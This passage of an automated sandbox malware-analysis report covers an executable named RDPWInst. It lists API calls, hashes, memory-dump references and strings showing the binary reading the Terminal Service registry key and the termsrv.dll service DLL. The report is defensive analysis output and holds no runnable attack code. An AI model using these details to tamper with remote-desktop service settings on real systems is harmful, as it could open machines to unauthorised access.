                                                                                 • Associated: 00000008.00000002.1464149900.000000000044B000.00000004.00000001.01000000.00000008.sdmp
                                                                                 • Associated: 00000008.00000002.1464265690.000000000044D000.00000008.00000001.01000000.00000008.sdmp
                                                                                 • Associated: 00000008.00000002.1464282028.0000000000450000.00000002.00000001.01000000.00000008.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_400000_RDPWInst.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ArraySafe$BoundIndex$CopyCreateVariant
                                                                                • String ID:
                                                                                • API String ID: 351091851-3916222277
                                                                                • Opcode ID: 73a745a2ba0fcdb29b417b5ebc4a60c480dc22ae13af212b94654390cab902c0
                                                                                • Instruction ID: 05f3e7187411a66581312748be8f4c599b64c7f757b61d9c7bcf5be2e84cfcbc
                                                                                • Opcode Fuzzy Hash: 73a745a2ba0fcdb29b417b5ebc4a60c480dc22ae13af212b94654390cab902c0
                                                                                • Instruction Fuzzy Hash: BB510E75A1061D9BCB62DB59CC91AD9B3BCAF0C314F0041DAE509D7311DA389FC18F69
                                                                                APIs
                                                                                • GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001D,0000D7B2,00000000,?,00406241,?,00000000,00404C6C,00000000,00406336,0040A254,00000000,0040A283,00000000), ref: 004061C9
                                                                                • WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001D,0000D7B2,00000000,?,00406241,?,00000000,00404C6C,00000000,00406336,0040A254,00000000,0040A283), ref: 004061CF
                                                                                • GetStdHandle.KERNEL32(000000F5,0040621C,00000002,0000D7B2,00000000,00000000,000000F5,Runtime error at 00000000,0000001D,0000D7B2,00000000,?,00406241,?,00000000,00404C6C), ref: 004061E4
                                                                                • WriteFile.KERNEL32(00000000,000000F5,0040621C,00000002,0000D7B2,00000000,00000000,000000F5,Runtime error at 00000000,0000001D,0000D7B2,00000000,?,00406241,?,00000000), ref: 004061EA
                                                                                • MessageBoxA.USER32(00000000,Runtime error at 00000000,Error,00000000), ref: 00406208
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.1463971744.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                 • Associated: 00000008.00000002.1463939516.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                                                                 • Associated: 00000008.00000002.1464083615.0000000000445000.00000004.00000001.01000000.00000008.sdmp
                                                                                 • Associated: 00000008.00000002.1464106397.0000000000446000.00000008.00000001.01000000.00000008.sdmp
                                                                                 • Associated: 00000008.00000002.1464149900.0000000000447000.00000004.00000001.01000000.00000008.sdmp
                                                                                 • Associated: 00000008.00000002.1464149900.000000000044B000.00000004.00000001.01000000.00000008.sdmp
                                                                                 • Associated: 00000008.00000002.1464265690.000000000044D000.00000008.00000001.01000000.00000008.sdmp
                                                                                 • Associated: 00000008.00000002.1464282028.0000000000450000.00000002.00000001.01000000.00000008.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_400000_RDPWInst.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: FileHandleWrite$Message
                                                                                • String ID: Error$Runtime error at 00000000
                                                                                • API String ID: 1570097196-2970929446
                                                                                • Opcode ID: c76f607bb4b5e88e0da518b266601389a2190e5d150480926aab9b651256bb34
                                                                                • Instruction ID: 3d9f27a079d1a1e85d20769b70378e11af8d5357eb747b9bac5a8d01f7cd0a80
                                                                                • Opcode Fuzzy Hash: c76f607bb4b5e88e0da518b266601389a2190e5d150480926aab9b651256bb34
                                                                                • Instruction Fuzzy Hash: F8F09064688700B9FA1077A09D8BF5A264C5741F18F648A7FBA107C0E3C7FC44C5D66E
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.1463971744.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                 • Associated: 00000008.00000002.1463939516.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                                                                 • Associated: 00000008.00000002.1464083615.0000000000445000.00000004.00000001.01000000.00000008.sdmp
                                                                                 • Associated: 00000008.00000002.1464106397.0000000000446000.00000008.00000001.01000000.00000008.sdmp
                                                                                 • Associated: 00000008.00000002.1464149900.0000000000447000.00000004.00000001.01000000.00000008.sdmp
                                                                                 • Associated: 00000008.00000002.1464149900.000000000044B000.00000004.00000001.01000000.00000008.sdmp
                                                                                 • Associated: 00000008.00000002.1464265690.000000000044D000.00000008.00000001.01000000.00000008.sdmp
                                                                                 • Associated: 00000008.00000002.1464282028.0000000000450000.00000002.00000001.01000000.00000008.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_400000_RDPWInst.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: dc7e807bea1f66438189088f752b6e292b8bc82f638beb9f71fc88f2eaf7a259
                                                                                • Instruction ID: cdb4153b94d32a19bbaa749183bbd41ea1cad44ce1b02117721c392bcbf59f8f
                                                                                • Opcode Fuzzy Hash: dc7e807bea1f66438189088f752b6e292b8bc82f638beb9f71fc88f2eaf7a259
                                                                                • Instruction Fuzzy Hash: AAC149627046001BE715AE7D9EC936E77899BC5326F18827FE504EB3C5DABCCE468348
                                                                                APIs
                                                                                • GetModuleHandleW.KERNEL32(kernel32.dll,?,?,?), ref: 00408D8D
                                                                                • GetProcAddress.KERNEL32(?,GetLongPathNameW), ref: 00408DA4
                                                                                • lstrcpynW.KERNEL32(?,?,?), ref: 00408DD4
                                                                                • lstrcpynW.KERNEL32(?,?,?,kernel32.dll,?,?,?), ref: 00408E43
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.1463971744.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                 • Associated: 00000008.00000002.1463939516.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                                                                 • Associated: 00000008.00000002.1464083615.0000000000445000.00000004.00000001.01000000.00000008.sdmp
                                                                                 • Associated: 00000008.00000002.1464106397.0000000000446000.00000008.00000001.01000000.00000008.sdmp
                                                                                 • Associated: 00000008.00000002.1464149900.0000000000447000.00000004.00000001.01000000.00000008.sdmp
                                                                                 • Associated: 00000008.00000002.1464149900.000000000044B000.00000004.00000001.01000000.00000008.sdmp
                                                                                 • Associated: 00000008.00000002.1464265690.000000000044D000.00000008.00000001.01000000.00000008.sdmp
                                                                                 • Associated: 00000008.00000002.1464282028.0000000000450000.00000002.00000001.01000000.00000008.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_400000_RDPWInst.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: lstrcpyn$AddressHandleModuleProc
                                                                                • String ID: GetLongPathNameW$kernel32.dll
                                                                                • API String ID: 682285877-568771998
                                                                                • Opcode ID: b8455c5fe78c2c884a1c523d091bd77d655f60f97b2ecbe02dba18575876a37c
                                                                                • Instruction ID: bfed53c75bae09f5f3cffe8e2e1a10a808aab42f40121fe7fe66bb66f29727bd
                                                                                • Opcode Fuzzy Hash: b8455c5fe78c2c884a1c523d091bd77d655f60f97b2ecbe02dba18575876a37c
                                                                                • Instruction Fuzzy Hash: 65213E71D10219EBDB10DBE8CA85A9EB3F9AF04344F14457BA584F72C1EB789E408B99
                                                                                APIs
                                                                                • GetLastError.KERNEL32(?,?,00447324,?,?,00443D51,00000000,00443FB2,?,?,?,?,00000008,00000000,00000000), ref: 0043CA09
                                                                                Strings
                                                                                • $sD, xrefs: 0043CA16
                                                                                • ServiceDll, xrefs: 0043CA58
                                                                                • \SYSTEM\CurrentControlSet\Services\TermService\Parameters, xrefs: 0043C9F8
                                                                                • %SystemRoot%\System32\termsrv.dll, xrefs: 0043CA53
                                                                                • [-] OpenKey error (code , xrefs: 0043CA1B
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.1463971744.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                 • Associated: 00000008.00000002.1463939516.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                                                                 • Associated: 00000008.00000002.1464083615.0000000000445000.00000004.00000001.01000000.00000008.sdmp
                                                                                 • Associated: 00000008.00000002.1464106397.0000000000446000.00000008.00000001.01000000.00000008.sdmp
                                                                                 • Associated: 00000008.00000002.1464149900.0000000000447000.00000004.00000001.01000000.00000008.sdmp
                                                                                 • Associated: 00000008.00000002.1464149900.000000000044B000.00000004.00000001.01000000.00000008.sdmp
                                                                                 • Associated: 00000008.00000002.1464265690.000000000044D000.00000008.00000001.01000000.00000008.sdmp
                                                                                 • Associated: 00000008.00000002.1464282028.0000000000450000.00000002.00000001.01000000.00000008.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_400000_RDPWInst.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ErrorLast
                                                                                • String ID: $sD$%SystemRoot%\System32\termsrv.dll$ServiceDll$[-] OpenKey error (code $\SYSTEM\CurrentControlSet\Services\TermService\Parameters
                                                                                • API String ID: 1452528299-1418523706
                                                                                • Opcode ID: d2f311149e027bc2624a0d6677516fc2b3f38769c85f091cbdc9e4c4a7fc29bb
                                                                                • Instruction ID: 567d776bcdb317a1c07dce30fb64d79162ce412928a02d635409720c7dced6b6
                                                                                • Opcode Fuzzy Hash: d2f311149e027bc2624a0d6677516fc2b3f38769c85f091cbdc9e4c4a7fc29bb
                                                                                • Instruction Fuzzy Hash: 5E1160746042049FD700FBAAED8355AB7A5DB89318F21A07FF504AB652CA396D01972D
                                                                                APIs
                                                                                • CloseServiceHandle.ADVAPI32(00000000,00000000,0043B52C,?,00000000,?,?,0043B6A3,?,00000000,00000000,?,00000000,00000000,00000010,00000000), ref: 0043B4BC
                                                                                • CloseServiceHandle.ADVAPI32(00000000,00000000,0043B52C,?,00000000,?,?,0043B6A3,?,00000000,00000000,?,00000000,00000000,00000010,00000000), ref: 0043B4D1
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.1463971744.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                 • Associated: 00000008.00000002.1463939516.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                                                                 • Associated: 00000008.00000002.1464083615.0000000000445000.00000004.00000001.01000000.00000008.sdmp
                                                                                 • Associated: 00000008.00000002.1464106397.0000000000446000.00000008.00000001.01000000.00000008.sdmp
                                                                                 • Associated: 00000008.00000002.1464149900.0000000000447000.00000004.00000001.01000000.00000008.sdmp
                                                                                 • Associated: 00000008.00000002.1464149900.000000000044B000.00000004.00000001.01000000.00000008.sdmp
                                                                                 • Associated: 00000008.00000002.1464265690.000000000044D000.00000008.00000001.01000000.00000008.sdmp
                                                                                 • Associated: 00000008.00000002.1464282028.0000000000450000.00000002.00000001.01000000.00000008.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_400000_RDPWInst.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CloseHandleService
                                                                                • String ID: error (code $$sD$[-]
                                                                                • API String ID: 1725840886-1845222458
                                                                                • Opcode ID: cf70b5b7ebfe22217b52877715410a6f055c53433fc66062313880689f831c28
                                                                                • Instruction ID: e4f6fbb8d87d745fddbbf3aa76ef7c2d42e102f771b0e90c1d198fe2bf5ce7b8
                                                                                • Opcode Fuzzy Hash: cf70b5b7ebfe22217b52877715410a6f055c53433fc66062313880689f831c28
                                                                                • Instruction Fuzzy Hash: 411165B4604204AFD700FBA5C946A5EBBE9EF8C309F51807AF504DB652C738AE409A6D
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.1463971744.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                 • Associated: 00000008.00000002.1463939516.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                                                                 • Associated: 00000008.00000002.1464083615.0000000000445000.00000004.00000001.01000000.00000008.sdmp
                                                                                 • Associated: 00000008.00000002.1464106397.0000000000446000.00000008.00000001.01000000.00000008.sdmp
                                                                                 • Associated: 00000008.00000002.1464149900.0000000000447000.00000004.00000001.01000000.00000008.sdmp
                                                                                 • Associated: 00000008.00000002.1464149900.000000000044B000.00000004.00000001.01000000.00000008.sdmp
                                                                                 • Associated: 00000008.00000002.1464265690.000000000044D000.00000008.00000001.01000000.00000008.sdmp
                                                                                 • Associated: 00000008.00000002.1464282028.0000000000450000.00000002.00000001.01000000.00000008.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_400000_RDPWInst.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: bd1bd09856875484954c00905d9deca0163cdd4237c815e7c02b6f8489ed4b52
                                                                                • Instruction ID: 2dafaf7b7fd63d2285bbc883fb865dc5d4a09b7d21a303d5748d7aa51e2b097e
                                                                                • Opcode Fuzzy Hash: bd1bd09856875484954c00905d9deca0163cdd4237c815e7c02b6f8489ed4b52
                                                                                • Instruction Fuzzy Hash: 33D18035E042599BCF10DBA9C4818FEB7B9EF49704B5080B7EC51A7251D738AD8BCB29
                                                                                APIs
                                                                                • CharNextW.USER32(?,?,00000000,0042E26E), ref: 0042E12C
                                                                                • CharNextW.USER32(?,?,00000000,0042E26E), ref: 0042E1D4
                                                                                • CharNextW.USER32(?,?,00000000,0042E26E), ref: 0042E1F9
                                                                                • CharNextW.USER32(00000000,?,?,00000000,0042E26E), ref: 0042E211
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.1463971744.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                 • Associated: 00000008.00000002.1463939516.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                                                                 • Associated: 00000008.00000002.1464083615.0000000000445000.00000004.00000001.01000000.00000008.sdmp
                                                                                 • Associated: 00000008.00000002.1464106397.0000000000446000.00000008.00000001.01000000.00000008.sdmp
                                                                                 • Associated: 00000008.00000002.1464149900.0000000000447000.00000004.00000001.01000000.00000008.sdmp
                                                                                 • Associated: 00000008.00000002.1464149900.000000000044B000.00000004.00000001.01000000.00000008.sdmp
                                                                                 • Associated: 00000008.00000002.1464265690.000000000044D000.00000008.00000001.01000000.00000008.sdmp
                                                                                 • Associated: 00000008.00000002.1464282028.0000000000450000.00000002.00000001.01000000.00000008.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_400000_RDPWInst.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CharNext
                                                                                • String ID:
                                                                                • API String ID: 3213498283-0
                                                                                • Opcode ID: 7217fcbca270de98ef8b4b4e8b85cbbd9122b6aa6dc92a8c6271a0bfb5eea1bb
                                                                                • Instruction ID: 1814d07402b1a7f57a8d7a3fe8506fdc05c33e5c0032e5bf9772b1ea290cc636
                                                                                • Opcode Fuzzy Hash: 7217fcbca270de98ef8b4b4e8b85cbbd9122b6aa6dc92a8c6271a0bfb5eea1bb
                                                                                • Instruction Fuzzy Hash: D5516D30B00624DFDF15EF6AD890A697BB5EF06304F8100E6E401DB3A5D778AD92CB5A
                                                                                APIs
                                                                                • GetThreadLocale.KERNEL32(?,00000000,00412F73,?,?,00000000), ref: 00412EF4
                                                                                  • Part of subcall function 00412C4C: GetLocaleInfoW.KERNEL32(?,?,?,00000100), ref: 00412C6A
                                                                                • GetThreadLocale.KERNEL32(00000000,00000004,00000000,00412F73,?,?,00000000), ref: 00412F24
                                                                                • EnumCalendarInfoW.KERNEL32(Function_00012E28,00000000,00000000,00000004,00000000,00412F73,?,?,00000000), ref: 00412F2F
                                                                                • GetThreadLocale.KERNEL32(00000000,00000003,Function_00012E28,00000000,00000000,00000004,00000000,00412F73,?,?,00000000), ref: 00412F4D
                                                                                • EnumCalendarInfoW.KERNEL32(Function_00012E64,00000000,00000000,00000003,Function_00012E28,00000000,00000000,00000004,00000000,00412F73,?,?,00000000), ref: 00412F58
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.1463971744.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                 • Associated: 00000008.00000002.1463939516.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                                                                 • Associated: 00000008.00000002.1464083615.0000000000445000.00000004.00000001.01000000.00000008.sdmp
                                                                                 • Associated: 00000008.00000002.1464106397.0000000000446000.00000008.00000001.01000000.00000008.sdmp
                                                                                 • Associated: 00000008.00000002.1464149900.0000000000447000.00000004.00000001.01000000.00000008.sdmp
                                                                                 • Associated: 00000008.00000002.1464149900.000000000044B000.00000004.00000001.01000000.00000008.sdmp
                                                                                 • Associated: 00000008.00000002.1464265690.000000000044D000.00000008.00000001.01000000.00000008.sdmp
                                                                                 • Associated: 00000008.00000002.1464282028.0000000000450000.00000002.00000001.01000000.00000008.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_400000_RDPWInst.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Locale$InfoThread$CalendarEnum
                                                                                • String ID:
                                                                                • API String ID: 4102113445-0
                                                                                • Opcode ID: 55eda0c8fa878099e478bf73f67320f830a82478ca3254b52692bae57d1b1ada
                                                                                • Instruction ID: 92d88662b64aaf91616c62fb6041fad244e46e3b41fee23c13374d6d2d88cd2b
                                                                                • Opcode Fuzzy Hash: 55eda0c8fa878099e478bf73f67320f830a82478ca3254b52692bae57d1b1ada
                                                                                • Instruction Fuzzy Hash: 930142713007046BE301A6B1CE13F9A726CEB82718F610437F100F66C1D6BCAE2192AD
                                                                                APIs
                                                                                • GetThreadLocale.KERNEL32(?,00000000,004131C3,?,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00412FCB
                                                                                  • Part of subcall function 00412C4C: GetLocaleInfoW.KERNEL32(?,?,?,00000100), ref: 00412C6A
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.1463971744.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000008.00000002.1463939516.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464083615.0000000000445000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464106397.0000000000446000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464149900.0000000000447000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464149900.000000000044B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464265690.000000000044D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464282028.0000000000450000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_400000_RDPWInst.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Locale$InfoThread
                                                                                • String ID: eeee$ggg$yyyy
                                                                                • API String ID: 4232894706-1253427255
                                                                                • Opcode ID: f0e1bd095bade663e8df46e19b5da6729160b75494cb6633c971c77849839ccd
                                                                                • Instruction ID: b43ca61d4524358572b11bc7e7a437c5213401559800a2754e6fdc13831cf262
                                                                                • Opcode Fuzzy Hash: f0e1bd095bade663e8df46e19b5da6729160b75494cb6633c971c77849839ccd
                                                                                • Instruction Fuzzy Hash: 97519835B00105ABDB10EF69C8425DEB7B5EF84305B21807BA401E73AADB7CDF92965D
                                                                                APIs
                                                                                • GetThreadLocale.KERNEL32(00000000,00412E17,?,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00412D20
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.1463971744.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000008.00000002.1463939516.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464083615.0000000000445000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464106397.0000000000446000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464149900.0000000000447000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464149900.000000000044B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464265690.000000000044D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464282028.0000000000450000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_400000_RDPWInst.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: LocaleThread
                                                                                • String ID: 0\D$`\D$|\D
                                                                                • API String ID: 635194068-1443555069
                                                                                • Opcode ID: 0cc7b5f362df3f3b22b96f6267770b75cfda245be271edcbb912247af85876fd
                                                                                • Instruction ID: 0f9472f532bfb6d97ff063cc401fba787666d5dde08e68930300e7878c0b733c
                                                                                • Opcode Fuzzy Hash: 0cc7b5f362df3f3b22b96f6267770b75cfda245be271edcbb912247af85876fd
                                                                                • Instruction Fuzzy Hash: 0831E871F006086BDB04DA55D891BAF73B9DB88314F65803BFA05E7382D67CED5183A8
                                                                                APIs
                                                                                • GetThreadLocale.KERNEL32(00000000,00412E17,?,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00412D20
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.1463971744.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000008.00000002.1463939516.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464083615.0000000000445000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464106397.0000000000446000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464149900.0000000000447000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464149900.000000000044B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464265690.000000000044D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464282028.0000000000450000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_400000_RDPWInst.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: LocaleThread
                                                                                • String ID: 0\D$`\D$|\D
                                                                                • API String ID: 635194068-1443555069
                                                                                • Opcode ID: c41b53ad99340a58dd1ea3df1ca7b54c87d2f8ec0189060bbe7d6b41ea99f8a8
                                                                                • Instruction ID: e329392f02449b06687ba54e558461cdf4d213220e6431f4601da2913400d418
                                                                                • Opcode Fuzzy Hash: c41b53ad99340a58dd1ea3df1ca7b54c87d2f8ec0189060bbe7d6b41ea99f8a8
                                                                                • Instruction Fuzzy Hash: A631E871F006086BDB04DA45D891BAF73B9DB88314F65803BFA05E7382D67CED5183A8
                                                                                APIs
                                                                                • GetThreadLocale.KERNEL32(00000004,?,00000000,?,00000100,00000000,00411595), ref: 0041152C
                                                                                • GetDateFormatW.KERNEL32(00000000,00000004,?,00000000,?,00000100,00000000,00411595), ref: 00411532
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.1463971744.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000008.00000002.1463939516.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464083615.0000000000445000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464106397.0000000000446000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464149900.0000000000447000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464149900.000000000044B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464265690.000000000044D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464282028.0000000000450000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_400000_RDPWInst.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: DateFormatLocaleThread
                                                                                • String ID: $yyyy
                                                                                • API String ID: 3303714858-404527807
                                                                                • Opcode ID: 5e56a81e6ec8d75afdc6e5fb3bd2dd6b96c822b9e08f0a8d12efe2345fd405b1
                                                                                • Instruction ID: 4e3523b49621e94f0abc5fe99f3e528012799777c4c12a7b6b737367db96c017
                                                                                • Opcode Fuzzy Hash: 5e56a81e6ec8d75afdc6e5fb3bd2dd6b96c822b9e08f0a8d12efe2345fd405b1
                                                                                • Instruction Fuzzy Hash: 8F219531A00118ABD710EF55C941AEEB3FAEF48300F514077F905E72A1D6389E40C7A9
                                                                                APIs
                                                                                • ExpandEnvironmentStringsW.KERNEL32(00000000,?,00000200,00000000,0043C52D,?,00447324,?,0043F7DC,00000000,0043FAEE,?,?,?,00447324), ref: 0043C4F1
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.1463971744.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000008.00000002.1463939516.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464083615.0000000000445000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464106397.0000000000446000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464149900.0000000000447000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464149900.000000000044B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464265690.000000000044D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464282028.0000000000450000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_400000_RDPWInst.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: EnvironmentExpandStrings
                                                                                • String ID: $sD$%ProgramFiles%$%ProgramW6432%
                                                                                • API String ID: 237503144-3145546840
                                                                                • Opcode ID: c5f063dfebfa4231b205ec39474c4c55e757e18b534536750d11f4516631b0cd
                                                                                • Instruction ID: dfc59d650baf98a512f6366ea296a42dbe4730e7440a0cbc8b484aecff229b80
                                                                                • Opcode Fuzzy Hash: c5f063dfebfa4231b205ec39474c4c55e757e18b534536750d11f4516631b0cd
                                                                                • Instruction Fuzzy Hash: 411184B0604168ABD714EB65CD92A9DB7B9DB48304F5140BBA205F3292DB38EE558B1C
                                                                                APIs
                                                                                • FindResourceW.KERNEL32(00400000,CHARTABLE,0000000A,?,?,0040ADC8,?,0040EE39,00000000,0040EF55), ref: 0040AEC0
                                                                                • LoadResource.KERNEL32(00400000,00000000,00400000,CHARTABLE,0000000A,?,?,0040ADC8,?,0040EE39,00000000,0040EF55), ref: 0040AED7
                                                                                • LockResource.KERNEL32(00000000,00400000,00000000,00400000,CHARTABLE,0000000A,?,?,0040ADC8,?,0040EE39,00000000,0040EF55), ref: 0040AEE8
                                                                                  • Part of subcall function 00415A68: GetLastError.KERNEL32(0040AEF9,00000000,00400000,00000000,00400000,CHARTABLE,0000000A,?,?,0040ADC8,?,0040EE39,00000000,0040EF55), ref: 00415A68
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.1463971744.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000008.00000002.1463939516.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464083615.0000000000445000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464106397.0000000000446000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464149900.0000000000447000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464149900.000000000044B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464265690.000000000044D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464282028.0000000000450000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_400000_RDPWInst.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Resource$ErrorFindLastLoadLock
                                                                                • String ID: CHARTABLE
                                                                                • API String ID: 1074440638-2668339182
                                                                                • Opcode ID: 2576ac7df62392cdd79f5341252eb240a6292d2d2deea21fb17a0e0107b6f450
